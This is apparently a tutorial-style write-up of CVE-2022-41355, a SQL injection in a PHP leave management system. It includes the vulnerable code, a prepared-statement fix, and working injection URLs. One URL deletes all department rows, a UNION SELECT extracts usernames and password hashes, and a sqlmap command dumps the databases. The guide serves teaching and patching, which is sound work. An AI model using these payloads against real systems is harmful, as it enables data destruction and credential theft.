CVE-2022-41355 - Exploiting Online Leave Management System v1. via SQL Injection in delete_department (id Parameter)

Author’s Note:  
This exclusive guide breaks down CVE-2022-41355 — a SQL injection flaw in the Online Leave Management System v1.. We’ll walk through what the vulnerability is, why it’s dangerous, how you can exploit it (“for educational use only!”), code snippets to understand the attack, and how to secure your systems.

🕵️‍♂️ What is CVE-2022-41355?

CVE-2022-41355 is a SQL Injection vulnerability discovered in Online Leave Management System v1., built with PHP and MySQL. It allows attackers to execute arbitrary SQL commands by exploiting insufficiently sanitized user input.

Affected URL:  
/leave_system/classes/Master.php?f=delete_department&id=

If an attacker can change the id parameter's content, they can mess with your database — viewing, modifying, or deleting sensitive data.

Let's look at a (simplified) code snippet from Master.php

if($_GET['f'] == 'delete_department') {
    $id = $_GET['id'];
    $query = "DELETE FROM department WHERE id = $id";
    $result = mysqli_query($conn, $query);
    if($result) {
        echo "Department deleted successfully!";
    }
}

The problem:
The $id is taken straight from user input, not sanitized or parameterized. This allows attackers to inject their own SQL.

If you send this malicious URL to the server

http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=%20OR%201=1

The actual SQL becomes

DELETE FROM department WHERE id =  OR 1=1

Result:
Every row in your department table will be deleted, because 1=1 is always true!

1. Enumerate Data

Try injecting a UNION SELECT to fetch usernames from another table.

Say there’s a users table with username and password columns

http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=-1 UNION SELECT 1, username, password FROM users --

If output is reflected anywhere (error messages, page content), you might get usernames and hashes.

sqlmap is a tool for automated SQL injection attacks. Use

sqlmap -u "http://yourtarget.com/leave_system/classes/Master.php?f=delete_department&id=1"; --cookie="PHPSESSID=your-session" --dbs

This will check the parameter; if it’s injectable, it shows dumped database info.

Do NOT trust user input. Ever.

- Use Prepared Statements with bindings:

$stmt = $conn->prepare("DELETE FROM department WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

🔗 Original References

- NVD - CVE-2022-41355
- Exploit Database Entry
- Full source code reference

🛡️ Conclusion

CVE-2022-41355 is a classic, easy-to-exploit SQL injection bug that could devastate your Online Leave Management System. It’s a textbook oversight: unsanitized user input in your SQL logic. If you run this system, fix it ASAP. Pen-testers and students, always get permission before testing!

Stay safe, code smart, and never trust user input!

*For responsible disclosure and training only — don’t be that attacker.*

Timeline

Published on: 10/06/2022 20:15:00 UTC
Last modified on: 10/07/2022 19:23:00 UTC